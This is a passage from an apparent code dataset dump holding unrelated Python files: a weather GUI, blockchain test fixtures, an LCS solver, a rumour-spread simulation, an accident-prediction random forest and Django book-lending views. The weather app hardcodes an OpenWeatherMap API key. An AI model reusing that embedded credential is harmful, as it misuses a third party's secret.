ms\n\n\nWith a GIN index\n\n#1\nPlanning Time: 3.680 ms\nExecution Time: 13.333 ms\n#2\n\nPlanning Time: 2.112 ms\nExecution Time: 15.078 ms\n\n\"\"\"","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"215581179","text":"from PIL import Image\r\nimport numpy as np\r\nW1=640\r\nH1=360\r\nW15=429\r\nH15=322\r\nW2=1280\r\nH2=720\r\n\r\npath=\"C:\\\\image\\\\\"\r\npref1=\"144\\\\\"\r\npref2=\"720\\\\\"\r\nsuff1=\".jpg\"\r\nsuff2=\".jpg\"\r\n\r\nimg_1=Image.open(path+pref1+str(\"0\")+suff1)\r\narray_1=np.array(img_1)[:, :]\r\narray_1=array_1.astype(np.float32)\r\nimg_1_720 = img_1.resize((W2, H2), Image.BILINEAR)\r\narray_1_720=np.array(img_1_720)[:, :]\r\narray_1_720=array_1_720.astype(np.float32)\r\nimg_2=Image.open(path+pref2+str(\"0\")+suff2)\r\narray_2=np.array(img_2)[:, :, 0:3]\r\narray_2=array_2.astype(np.float32)\r\nprint(array_1.shape)\r\na=0\r\nfor i in range(720):\r\n for j in range(1280):\r\n for k in range(3):\r\n a=a+(array_1_720[i][j][k]-array_2[i][j][k])*(array_1_720[i][j][k]-array_2[i][j][k])/(720*1280*3)\r\nprint(a)\r\n","sub_path":"Temp/기본 cost.py","file_name":"기본 cost.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"347799485","text":"import tkinter as tk\r\nimport requests\r\nhieght= 500\r\nwidth=600\r\nroot = tk.Tk()\r\n\r\ndef test_fun(entry):\r\n print(entry)\r\n\r\ndef fr(weather):\r\n try:\r\n name = weather['name']\r\n des = weather['weather'][0]['description']\r\n temp = weather['main']['temp']\r\n\r\n fs='City: %s \nConditions: %s \nTemp (F*): %s' % (name, des, temp)\r\n except Exception:\r\n fs=\"Location Not Found......\"\r\n\r\n return fs\r\n\r\ndef weather1(city):\r\n key='8f38c3036b95711787bb4fb29c1dde56'\r\n url='http://api.openweathermap.org/data/2.5/weather'\r\n p={'APPID': key, 'q': city, 'units': 'imperial'}\r\n r= requests.get(url, params=p)\r\n w=r.json()\r\n label['text'] = fr(w)\r\n print(w['name'])\r\n print(w['weather'][0]['description'])\r\n print(w['main']['temp'])\r\n\r\nlabel1 = tk.Label(root, text='Weather App', bg = 'white')\r\nlabel1.config(font=('avenir', 20))\r\n\r\ncanvas = tk.Canvas (root, height=hieght, width= width)\r\ncanvas.pack() \r\n\r\nframe = tk.Frame(root, bg='#000000', bd=2,)\r\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.1, anchor='n') \r\n# label1=label(root, text='Enter 
location',width=20,font=(\"bold\",20))\r\n# label1.place(x=80,y=52)\r\nbutton = tk.Button(frame, text=\"Fetch\", font=36, bg='#FF00FF',command=lambda: weather1(entry.get()))\r\nbutton.place(relx=0.7, relwidth=0.3, relheight=1) \r\n\r\nentry=tk.Entry(frame, font=30)\r\nentry.place(relwidth=0.69, relheight=1)\r\n\r\nframe2 = tk.Frame(root, bg='#000000', bd=2)\r\nframe2.place(relx=0.5, rely=0.25, relwidth=0.75, relheight=0.6, anchor='n')\r\n\r\nlabel=tk.Label(frame2, bg='#C0C0C0')\r\nlabel.place(relwidth=1, relheight=1)\r\n\r\nroot.mainloop()\r\n","sub_path":"MiniProject Task/2.weather app/weather_app.py","file_name":"weather_app.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"589058612","text":"import os\nfrom typing import List\n\nimport pytest\nfrom raiden_libs.contracts import ContractManager\nfrom web3 import Web3\nfrom web3.contract import get_event_data, Contract\n\nimport pathfinder\nfrom pathfinder.utils.types import Address\n\n\n@pytest.fixture(scope='session')\ndef contracts_path() -> str:\n module_dir = os.path.dirname(pathfinder.__file__)\n return os.path.join(module_dir, 'contract')\n\n\n@pytest.fixture(scope='session')\ndef contract_manager(contracts_path: str):\n return ContractManager(os.path.join(contracts_path, 'contracts_12032018.json'))\n\n\n@pytest.fixture(scope='session')\ndef token_addresses(\n web3: Web3,\n contract_manager: ContractManager\n) -> List[Address]:\n\n token = web3.eth.contract(\n abi=contract_manager.get_contract_abi('HumanStandardToken'),\n bytecode=contract_manager.get_contract_bytecode('HumanStandardToken'),\n )\n\n addresses = list()\n for i in range(4):\n tx_hash = token.deploy(args=(\n 1_000_000, # initial amount\n 18, # decimal units\n f'TestToken{i}', # Token name\n f'TT{i}', # Token symbol\n ))\n\n addresses.append(web3.eth.getTransactionReceipt(tx_hash).contractAddress)\n\n return addresses\n\n\n@pytest.fixture(scope='session')\ndef secret_registry_address(\n web3: Web3,\n contract_manager: ContractManager\n) -> Address:\n\n secret_registry = web3.eth.contract(\n abi=contract_manager.get_contract_abi('SecretRegistry'),\n bytecode=contract_manager.get_contract_bytecode('SecretRegistry')\n )\n\n tx_hash = secret_registry.deploy()\n return web3.eth.getTransactionReceipt(tx_hash).contractAddress\n\n\n@pytest.fixture(scope='session')\ndef token_network_addresses(\n web3: Web3,\n contract_manager: ContractManager,\n token_addresses: List[Address],\n secret_registry_address: Address,\n) -> List[Address]:\n\n token_network = web3.eth.contract(\n abi=contract_manager.get_contract_abi('TokenNetwork'),\n bytecode=contract_manager.get_contract_bytecode('TokenNetwork')\n )\n\n addresses = list()\n for token_address in token_addresses:\n tx_hash = token_network.deploy(args=(\n token_address,\n secret_registry_address,\n ))\n\n addresses.append(web3.eth.getTransactionReceipt(tx_hash).contractAddress)\n\n return addresses\n\n\n@pytest.fixture(scope='session')\ndef token_network_registry(\n web3: Web3,\n contract_manager: ContractManager,\n secret_registry_address: Address,\n) -> List[Address]:\n\n token_network_registry = web3.eth.contract(\n abi=contract_manager.get_contract_abi('TokenNetworkRegistry'),\n bytecode=contract_manager.get_contract_bytecode('TokenNetworkRegistry')\n )\n tx_hash = token_network_registry.deploy(args=(\n secret_registry_address,\n ))\n\n registry_address = web3.eth.getTransactionReceipt(tx_hash).contractAddress\n\n 
token_network_registry = web3.eth.contract(\n registry_address,\n abi=contract_manager.get_contract_abi('TokenNetworkRegistry'),\n )\n return token_network_registry\n\n\n@pytest.fixture(scope='session')\ndef token_network_addresses_from_registry(\n web3: Web3,\n contract_manager: ContractManager,\n token_network_registry: Contract,\n token_addresses: List[Address],\n) -> List[Address]:\n\n token_network_addresses = []\n\n for token_address in token_addresses:\n tx = token_network_registry.functions.createERC20TokenNetwork(token_address).transact()\n receipt = web3.eth.getTransactionReceipt(tx)\n\n event_data = get_event_data(\n contract_manager.get_event_abi('TokenNetworkRegistry', 'TokenNetworkCreated'),\n receipt['logs'][0]\n )\n token_network_address = event_data['args']['token_network_address']\n\n token_network_addresses.append(token_network_address)\n\n return token_network_addresses\n\n\n@pytest.fixture()\ndef token_network_contracts(\n web3: Web3,\n contract_manager: ContractManager,\n token_addresses: List[Address],\n token_network_addresses: List[Address],\n contracts_path: str,\n token_network_addresses_from_registry: List[Address],\n) -> List[Contract]:\n\n contracts = [\n web3.eth.contract(\n token_network_address,\n abi=contract_manager.get_contract_abi('TokenNetwork')\n )\n for token_network_address in token_network_addresses\n ]\n\n return contracts\n","sub_path":"pathfinder/tests/fixtures/contracts.py","file_name":"contracts.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"503087059","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 16 16:51:00 2017\r\n\r\n@author: r.dewinter\r\n\"\"\"\r\nimport numpy as np\r\n\r\ndef regpoly0(S):\r\n m,n = S.shape\r\n f = np.ones((m,1))\r\n df = np.zeros(n)\r\n return [f, df]","sub_path":"CEGO/regpoly0.py","file_name":"regpoly0.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"196761773","text":"# LCS, 最长公共子串\n# author: kurumi\n# date:2019.08.13\nclass Solution:\n def lcs(self, s1, s2):\n dp = [[0 for j in range(len(s1) + 1)] for i in range(len(s2) + 1)]\n for i in range(1, len(s2) + 1):\n for j in range(1, len(s1) + 1):\n if s1[j - 1] == s2[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] + 1\n else:\n dp[i][j] = max([dp[i - 1][j], dp[i][j - 1]])\n for i, v in enumerate(dp):\n print(v)\n print(\"lcs len is: \", dp[len(s2)][len(s1)])\n\n\nif __name__ == \"__main__\":\n s1 = input()\n s2 = input()\n sol = Solution()\n sol.lcs(s1, s2)\n\n# 状态转移公式: dp[i][j] = dp[i-1][j-1] + 1 #当a[i] == b[j]\n# ########## = max([dp[i-1][j], dp[i][j-1]]) #当a[i] != b[j]\n","sub_path":"dynamic/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"604251289","text":"import networkx as nx\nimport sys\nimport csv\nimport random\nimport sys\nimport csv\nimport operator\n\n\ndef spreadrumour(g,beta,seeds, outputFile):\n\n #Read the file into a graph\n G = g\n\n #Find the total number of nodes\n\n\n #Mark 5 nodes as infected\n numberOfNodesToInfect = seeds\n\n b = beta\n\n\n\n I = numberOfNodesToInfect #we seed the outbreak with one infectious individual\n S = 0 #this is the number of susceptibles\n\n\n #Now we're going to set the simulation clock to zero.\n t = 0\n\n susceptible = {}\n infected ={}\n newlyInfected = []\n\n 
print(numberOfNodesToInfect)\n\n bip=nx.get_node_attributes(g,'bipartite')\n\n #Infect some nodes at random\n count = 0\n for i in range(0,numberOfNodesToInfect):\n node = random.choice(G.nodes()) #assuming no same nodes are picked in choice\n if(bip[node] == 0):\n infected[node] = node\n\n\n sList = [] #we'll keep the number of susceptible individuals at each step on this list\n iList = [] #the number of infected individuals here\n #rList = [] #the number who have recovered here\n\n S = len(susceptible)\n I = len(infected)\n\n\n sList.append(S)\n iList.append(I)\n #rList.append(R)\n\n print(infected)\n print(S)\n print(I)\n\n infectedCircles = {}\n\n while I > 0:\n newlyInfected = {}\n\n\n #Find the susceptibles\n susceptible={}\n #Find the newly infected circles\n newlyInfectedCircles = {}\n for node in infected:\n neighbours = G.neighbors(node)\n for neighbour in neighbours:\n if(bip[neighbour] == 1):\n if (neighbour not in newlyInfectedCircles) and (neighbour not in infectedCircles) :\n newlyInfectedCircles[neighbour] = neighbour\n\n #Now the susceptibles are spreading through the circles.\n for newlyInfectedCircle in infectedCircles:\n for neighbor in G.neighbors(newlyInfectedCircle):\n if(bip[neighbor] == 0) and (neighbor not in susceptible) and (neighbor not in infected):\n susceptible[neighbor] = neighbor\n\n\n\n\n S = len(susceptible)\n I = len(infected)\n\n print('------------------------Start with new susceptibles - Begin ---------------')\n print(S)\n print(I)\n print('------------------------Start with new susceptibles - - End---------------')\n\n #NEW PEOPLE ARE GETTING INFECTED\n newlyInfected = {}\n infected_num= int(round(b*len(susceptible)))\n print('Infecting ', infected_num ,'people now.')\n for i in range(0,infected_num):\n node=random.sample(susceptible,1)\n newlyInfected[node[0]] = node[0]\n del susceptible[node[0]]\n\n\n for i in newlyInfected:\n infected[i] = i\n\n for newlyInfectedCircle in newlyInfectedCircles:\n infectedCircles[newlyInfectedCircle] = newlyInfectedCircle\n\n S = len(susceptible)\n I = len(infected)\n #R = len(immune)\n\n #Then we add these values to their respective lists\n sList.append(S)\n iList.append(I)\n #rList.append(R)\n\n\n #This prints the time to standard out - usually the terminal you're running from -\n # and increments the timestep.\n t += 1\n if(t > 100):\n break\n\n\n w = csv.writer(open(outputFile, \"wb\"))\n for sus, inf in zip(sList, iList):\n w.writerow([sus, inf])\n\n","sub_path":"SIsimulation.py","file_name":"SIsimulation.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"175020517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 20 11:32:11 2020\n\n@author: aboutet\n\"\"\"\n\nimport os\nimport sys\nimport warnings\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\n \n# Modules personnels\nimport ml_utils\nimport plot\nfrom variables import *\n\n# Modules Python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Librairies d'apprentissage automatique\nfrom sklearn import tree, ensemble, metrics, model_selection\nfrom sklearn.preprocessing import scale, StandardScaler\nfrom sklearn.tree import export_graphviz\nfrom sklearn.externals.six import StringIO \nfrom sklearn.metrics import make_scorer\nfrom sklearn.metrics import roc_curve, auc, roc_auc_score\nfrom sklearn.model_selection import 
GridSearchCV\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cluster import KMeans\nimport pickle\n\ndef training_materiel(es, dataM):\n FEATURES_HERE_QUALI_NO_ORDER = [\"PRIORITYRD\",\"AR_AUTO\",\"AR_BUS\",\"AR_TAXIS\",\"AR_CARPOOL\",\"AR_PEDEST\",\"AR_TRUCKS\",\"AR_TRAFF\",\"AR_DELIV\",\"AR_EMERVEH\",\"AR_MOTOR\",\n \"PAVED\",\"PRIVATE\",\"FRONTAGE\",\"BRIDGE\",\"TUNNEL\",\"RAMP\",\"TOLLWAY\",\"POIACCESS\",\"CONTRACC\",\"ROUNDABOUT\",\"INTERINTER\"]\n FEATURES_HERE_QUALI_ORDERED = [\"SPEED_CAT\",\"FUNC_CLASS\"]\n FEATURES_HERE_QUANTI = [\"N_SHAPEPNT\"]\n\n # MISE A JOUR de la liste des variables après preprocessing\n FEATURES_HERE_QUALI_NO_ORDER = FEATURES_HERE_QUALI_NO_ORDER + [ADJ_SUP, ADJ_INF] + [CONTIENT_INTERSECTION] + [CORINE]\n FEATURES_HERE_QUANTI = FEATURES_HERE_QUANTI + [WAZE_TOTAL, WAZE_ACCIDENT, WAZE_JAM, WAZE_CLOSED, WAZE_WEATHER, WAZE_HAZARD] + ALERTES_COYOTE + [TOTAL_COYOTE] + [TRAFIC]\n \n # Gardées après séléction phase 1 - CAS SANS ALERTES TEMPORELLES\n aggregation = {TRAFIC:'mean',WAZE_TOTAL:'mean', \"N_SHAPEPNT\":'mean',WAZE_JAM:'mean', WAZE_HAZARD:'mean',TOTAL_COYOTE:'mean'}\n QUANTI_KEEP = list(aggregation.keys())\n QUALI_ORDERED_KEEP = [\"FUNC_CLASS\",\"SPEED_CAT\"]\n QUALI_NOORDER_KEEP = [CORINE, 'PAVED', 'PRIVATE', 'PRIORITYRD']\n \n QUANTI_KEEP = QUANTI_KEEP + METEO_QUANTI\n QUALI_ORDERED_KEEP = QUALI_ORDERED_KEEP\n QUALI_NOORDER_KEEP = QUALI_NOORDER_KEEP + [INFO_JOUR,JOUR_SEMAINE, MOIS, CRENEAU]\n \n dataM[CLASSES_SIMPLES] = [0 if ac > 0 else 1 for ac in dataM[ID_ACC]]\n\n baro = barometre_accidents_materiels(dataM, QUANTI_KEEP, QUALI_NOORDER_KEEP, QUALI_ORDERED_KEEP, split = 'raffinement_speeds')\n\n baro.fit(print_results = True)\n\n path = 'training/Barometre_materiel.pkl'\n baro.save(path)\n\n return baro\n\nclass barometre_accidents_materiels():\n \n def __init__(self, data, quantis, qualiNoOrder, qualiOrder, split = 'speed'):\n '''\n Constructor\n '''\n \n # Constantes\n self.nTrees = 200\n self.maxDepth = 100\n self.maxLeaves = 100\n self.verbose = 1\n \n self.positive_class = 0\n \n # Constantes pour le raffinement du split\n self.speeds_change = [4,6,5,7]\n self.K = 3\n self.cols_change = [COURBURE, TRAFIC, TOTAL_COYOTE]\n self.corresp_clusters = dict()\n \n # Attributs passés\n self.quantis = quantis\n self.qualiNoOrder = qualiNoOrder\n self.qualiOrder = qualiOrder\n \n self.keys = None\n self.split = split\n if self.split == 'speed':\n self.split_function = self.split_speed\n if self.split == 'raffinement_speeds':\n self.KMeans = None\n self.split_function = self.split_raffinement\n \n \n # Données d'entrainement: déterminent d'entrée la structure des modèles dans le constructeur\n self.data = data\n self.data[CLASSES_SIMPLES] = [0 if ac > 0 else 1 for ac in self.data[ID_ACC]]\n self.target = self.data[CLASSES_SIMPLES]\n self.datas = self.split_function(self.data, first_time = True)\n # Mise à jour des clés\n self.keys = list(self.datas.keys()) \n \n self.weights = [len(self.datas[key]) for key in self.keys]\n \n # Formattage pour l'apprentissage\n self.scaler_quanti = {key: StandardScaler(with_mean = True, with_std = True) for key in self.keys}\n self.scaler_qualiOrder = {key: StandardScaler(with_mean = True, with_std = True) for key in self.keys}\n self.trains, self.targets = self.preprocessing_learning()\n self.cols = self.ref_columns() # Learning and prediction will be done on sorted union of columns (reference to avoid errors)\n \n # Modele \n self.rf = {key: 
ensemble.RandomForestClassifier(class_weight = 'balanced', n_estimators = self.nTrees, max_features = None, max_depth = self.maxDepth, max_leaf_nodes = self.maxLeaves, \n min_samples_leaf = 5, min_samples_split = 2, verbose = self.verbose) for key in self.keys}\n self.importance = None\n \n \n ## Split Functions that may vary\n def split_Kmeans(self, plot = False):\n return 0\n \n def split_speed(self, data, plot = True, first_time = True):\n datas = dict()\n data = data.reset_index(drop = True)\n speeds = list(data[SPEED].unique())\n for key in speeds:\n datas[key] = data[data[SPEED]==key]\n return datas\n \n def split_raffinement(self, data, first_time = True, plot = False):\n datas = dict()\n data = data.reset_index(drop = True)\n speeds = list(data[SPEED].unique())\n for key in speeds:\n datas[key] = data[data[SPEED]==key]\n \n # Raffinement sur les vitesses contenues dans self.speeds_change\n for oldKey in self.speeds_change:\n # Récupération ancienne data et bonnes colonnes\n data_ = datas[oldKey][[AGREGATS]+self.cols_change]\n \n # Scale et KMeans, récupération colonne Cluster dans datas[key]\n data_[self.cols_change] = scale(data_[self.cols_change])\n data_ = data_[[AGREGATS]+self.cols_change].drop_duplicates(keep = 'first')\n \n if first_time:\n # La première fois, on entraine un Kmeans\n self.KMeans = KMeans(self.K)\n self.KMeans.fit(data_[self.cols_change])\n data_['Clusters'] = self.KMeans.labels_\n self.corresp_clusters[oldKey] = data_[[AGREGATS, 'Clusters']].drop_duplicates(keep = 'first').copy()\n \n # Les fois suivantes, on attribue aux nouvelles valeurs leur cluster le plus proche\n # Attention: on ne veut pas que le merge reset l'index de notre donnée car on veut pouvoir la remettre dans l'ordre\n index = datas[oldKey].index\n n = 1000\n #self.corresp_clusters[oldKey][AGREGATS] = np.round(self.corresp_clusters[oldKey][AGREGATS] * n).astype(int)\n #datas[oldKey][AGREGATS] = np.round(datas[oldKey][AGREGATS] * n).astype(int)\n print(self.corresp_clusters[oldKey][AGREGATS])\n print(datas[oldKey][AGREGATS])\n datas[oldKey] = datas[oldKey].merge(self.corresp_clusters[oldKey], on = AGREGATS, how = 'left')\n datas[oldKey].index = index\n datas[oldKey]['Clusters'] = datas[oldKey]['Clusters'].astype(int)\n \n # Split sur la colonne cluster dans des keys tuple\n for cluster in datas[oldKey]['Clusters'].unique():\n newKey = (oldKey, cluster)\n datas[newKey] = datas[oldKey][datas[oldKey]['Clusters']==cluster].copy()\n \n \n \n # Plot optionnel des nuages de point\n if plot:\n print(\"Clustering sur la vitesse (variables centrées-réduites) : \"+str(oldKey))\n data_.plot.scatter(x = COURBURE, y = TOTAL_COYOTE, c = 'Clusters', colormap='viridis')\n data_.plot.scatter(x = COURBURE, y = TRAFIC, c = 'Clusters', colormap='viridis')\n data_.plot.scatter(x = TOTAL_COYOTE, y = TRAFIC, c = 'Clusters', colormap='viridis')\n plt.show()\n \n # Suppression old key\n del datas[oldKey]\n \n \n return datas\n \n ## Learning or test data preparation phase\n def preprocessing_learning(self):\n trains = dict()\n targets = dict()\n \n for key in self.keys:\n # Choix des variables explicatives et target\n trainM = self.datas[key][self.quantis+self.qualiNoOrder+self.qualiOrder]\n YM = self.datas[key][CLASSES_SIMPLES]\n\n # Encoding du qualitatif\n trainM = ml_utils.preproc_features(trainM, self.quantis, self.qualiOrder, self.qualiNoOrder)\n\n # Centrage-Normalisation du quantitatif\n self.scaler_quanti[key].fit(trainM[self.quantis])\n self.scaler_qualiOrder[key].fit(trainM[self.qualiOrder])\n \n \n 
trainM[self.quantis] = self.scaler_quanti[key].transform(trainM[self.quantis])\n trainM[self.qualiOrder] = self.scaler_qualiOrder[key].transform(trainM[self.qualiOrder]) \n \n trains[key] = trainM\n targets[key] = YM\n return trains, targets\n \n def preprocessing_test(self, datas):\n trains = dict()\n \n for key in self.keys:\n # Choix des variables explicatives et target\n trainM = datas[key][self.quantis+self.qualiNoOrder+self.qualiOrder]\n\n # Encoding du qualitatif\n trainM = ml_utils.preproc_features(trainM, self.quantis, self.qualiOrder, self.qualiNoOrder)\n\n # Centrage-Normalisation du quantitatif\n trainM[self.quantis] = self.scaler_quanti[key].transform(trainM[self.quantis])\n trainM[self.qualiOrder] = self.scaler_qualiOrder[key].transform(trainM[self.qualiOrder]) \n \n trains[key] = trainM\n return trains\n \n ## Proper Learning & Learning Features\n def ref_columns(self):\n # On récupère l'union des colonnes car il se peut que certaines parties des nouvelles données à prédire ne les aient pas toutes\n cols = set()\n for key in self.keys:\n cols_ = set(self.trains[key].columns)\n cols = cols.union(cols_)\n # return as sorted list and not set (or there will be problems when ordering DataFrame columns)\n return sorted(cols)\n \n \n def fit(self, print_results = True, retourne = False):\n \n # Apprentissage sur chaque split\n for key in self.keys:\n for col in self.cols:\n if col not in self.trains[key].columns:\n self.trains[key][col] = 0\n self.trains[key] = self.trains[key][self.cols]\n self.rf[key] = self.rf[key].fit(self.trains[key], self.targets[key])\n \n if print_results:\n if retourne:\n mat, confusion, prec,recall,giny = self.predict_with_result(None, None, learning_data = True, print_ = True, retourne = retourne)\n return mat, confusion, prec,recall,giny\n else:\n self.predict_with_result(None, None, learning_data = True, print_ = True, retourne = False)\n \n \n def feature_importances_(self, plot = False):\n # On récupère la taille de tous les sous jeux de données pour pondérer la moyenne\n weights = []\n for key in self.keys:\n weights.append(len(self.datas[key]))\n \n # Intialisation du Df\n importances = pd.DataFrame(columns=self.cols)\n \n # On récupère les importances des RF\n for i, key in enumerate(self.keys):\n df_cols = self.trains[key].columns\n df = pd.DataFrame(columns = df_cols)\n df.loc[0] = self.rf[key].feature_importances_\n for col in self.cols:\n if col not in df_cols:\n df[col] = 0\n df = df[self.cols]\n importances.loc[i] = df.values[0,:]\n \n # Moyenne pondérée\n cols = importances.columns\n importances['weights'] = weights\n imp = []\n for col in cols:\n imp.append((importances[col]*importances['weights']).sum()/importances['weights'].sum())\n df_imp = pd.DataFrame()\n df_imp['Variables'] = imp\n df_imp.index = cols\n df_imp = df_imp.sort_values(ascending=False, by = 'Variables')\n if plot:\n df_imp.plot.bar(figsize = (10,7))\n self.importance = df_imp\n return self.importance\n \n \n ## Test & Performance Features\n def predict(self, test, learning_data = False, probas = False):\n \n # Stockage de la prédiction dans un vecteur Y qui sera réordonné\n Y = pd.DataFrame()\n if learning_data:\n tests = self.trains\n else:\n tests = self.split_function(test, first_time = False, plot = False)\n tests = self.preprocessing_test(tests)\n for key in self.keys:\n # Ajout des modalités de variables qualitatives qui ne seraitent pas présents dans l'échantiilon de test: on le met à zéro\n for col in self.cols:\n if col not in tests[key].columns:\n 
tests[key][col] = 0\n tests[key] = tests[key][self.cols]\n if probas:\n pred = self.rf[key].predict_proba(tests[key])[:,self.positive_class]\n else:\n pred = self.rf[key].predict(tests[key])\n Y = Y.append(pd.DataFrame({'pred':pred}, index = tests[key].index))\n Y = Y.sort_index()\n return Y.values\n \n def predict_with_result(self, test, y_true, learning_data = False, print_ = True, retourne = False):\n if learning_data:\n y_true = self.target\n y_pred = self.predict(test, probas = False, learning_data = learning_data)\n confusion = metrics.confusion_matrix(y_true, y_pred)\n prec = metrics.precision_score(y_true, y_pred, pos_label = self.positive_class)\n recall = metrics.recall_score(y_true, y_pred, pos_label = self.positive_class)\n giny = 2*metrics.roc_auc_score(y_true, y_pred)-1\n \n if print_:\n print(\"Confusion matrix:\")\n print(confusion)\n print(\"Precision:\")\n print(prec)\n print(\"Recall:\")\n print(recall)\n print('Normalized Gini:')\n print(giny)\n \n if retourne:\n return y_pred, confusion, prec, recall, giny\n \n \n \n ## Save & Load Models\n def save(self, path):\n # Open the file to save as pkl file\n file = open(path, 'wb')\n pickle.dump(self, file)\n file.close()\n \n def load(self, path):\n return 0\n","sub_path":"flask/training/training_materiel.py","file_name":"training_materiel.py","file_ext":"py","file_size_in_byte":15013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"468627941","text":"from django.conf import settings\nimport os\n\nBASE_DIR = \"/Users/nrd1012/Projects/paragon/website/paragon\"\n\ndef setup_db():\n settings.configure(\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'pg_db.sqlite3'),\n }\n })\n\n","sub_path":"script/db_setup.py","file_name":"db_setup.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"306176252","text":"from django.shortcuts import (\n render,\n redirect,\n get_object_or_404,\n)\nfrom django.http import HttpResponse\n\nfrom django.views.decorators.http import require_POST\nfrom .models import Book\nfrom .forms import BookForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n# aliased so the login/logout view functions below do not shadow them\nfrom django.contrib.auth import authenticate, login as auth_login, logout as auth_logout\n\ndef index(request):\n data = {\n 'books' : Book.objects.all(),\n }\n return render(request, 'book_lending_system/index.html',data\n )\n\ndef add(request):\n form = BookForm(request.POST or None)\n if form.is_valid():\n Book.objects.create(**form.cleaned_data)\n return redirect('book_lending_system:index')\n\n data = {\n 'form': form,\n }\n return render(request, 'book_lending_system/edit.html', data\n )\n\ndef edit(request, editing_id):\n\n book = get_object_or_404(Book, id=editing_id)\n if request.method == 'POST':\n form = BookForm(request.POST)\n if form.is_valid():\n book.title = form.cleaned_data['title']\n book.item_price = form.cleaned_data['item_price']\n book.save()\n return redirect('book_lending_system:index')\n else:\n # On a GET request (initial display), bind the data stored in the DB to the form\n form = BookForm({'title': book.title,'item_price': book.item_price})\n d = {\n 'form': form,\n }\n\n return render(request, 'book_lending_system/edit.html', d\n )\n\ndef delete(request):\n delete_ids = request.POST.getlist('delete_ids')\n if delete_ids:\n Book.objects.filter(id__in=delete_ids).delete()\n return redirect('book_lending_system:index'\n )\n\ndef login(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n message = {\n 'text': '',\n }\n if user is not None:\n if user.is_active:\n auth_login(request, user)\n return render(request, 'book_lending_system/index.html'\n )\n else:\n message['text'] = 'This account is not active'\n return render(request, 'book_lending_system/index.html', message\n )\n else:\n message['text'] = 'The username or password is incorrect'\n return render(request, 'book_lending_system/index.html', message\n )\n\ndef logout(request):\n auth_logout(request)\n return render(request, 'book_lending_system/login.html'\n )\n","sub_path":"book_lending_system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"230996950","text":"# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"\nTests to ensure that CLI commands work properly.\n\"\"\"\nfrom pathlib import Path\nfrom unittest import TestCase\n\nfrom dazl import sandbox\nfrom dazl.cli import _main\n\nDAML_PATH = Path(__file__).parent.parent.parent / '_template' / 'Main.daml'\n\n\nclass TestCliLs(TestCase):\n\n def test_simple_ls(self):\n with sandbox(daml_path=DAML_PATH) as proc:\n exit_code = _main(f'dazl ls --url {proc.url} --parties=Alice'.split(' '))\n\n self.assertEqual(exit_code, 0)\n\n def test_simple_ls_two_parties(self):\n with sandbox(daml_path=DAML_PATH) as proc:\n exit_code = _main(f'dazl ls --url {proc.url} --parties=Alice,Bob'.split(' '))\n\n self.assertEqual(exit_code, 0)\n\n def test_env_ls(self):\n import os\n with sandbox(daml_path=DAML_PATH) as proc:\n os.environ['DAML_LEDGER_URL'] = proc.url\n os.environ['DAML_LEDGER_PARTY'] = 'Alice'\n exit_code = _main('dazl ls'.split(' '))\n\n self.assertEqual(exit_code, 0)\n","sub_path":"python/tests/unit/test_cli_ls.py","file_name":"test_cli_ls.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"571811354","text":"'''\nA test lego that returns None\n'''\nfrom Legobot.Lego import Lego\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass NoneLego(Lego):\n\n @staticmethod\n def listening_for(message):\n logger.debug('nonelego checking...')\n try:\n return message['text'].split()[0] == '!none'\n except Exception as e:\n logger.debug('nonelego rejected message')\n logger.debug('Reason: %s' % e)\n return False\n\n def handle(self, message):\n logger.info('Handling message, returning None')\n opts = self._handle_opts(message)\n\n self.reply(message, None, opts)\n\n @staticmethod\n def _handle_opts(message):\n try:\n target = message['metadata']['source_channel']\n opts = {'target': target}\n except IndexError:\n opts = None\n return opts\n\n @staticmethod\n def get_name():\n return 'nonetest'\n\n @staticmethod\n def get_help():\n return 'Returns a None object to see if any legos explode.'\n","sub_path":"local/NoneLego.py","file_name":"NoneLego.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 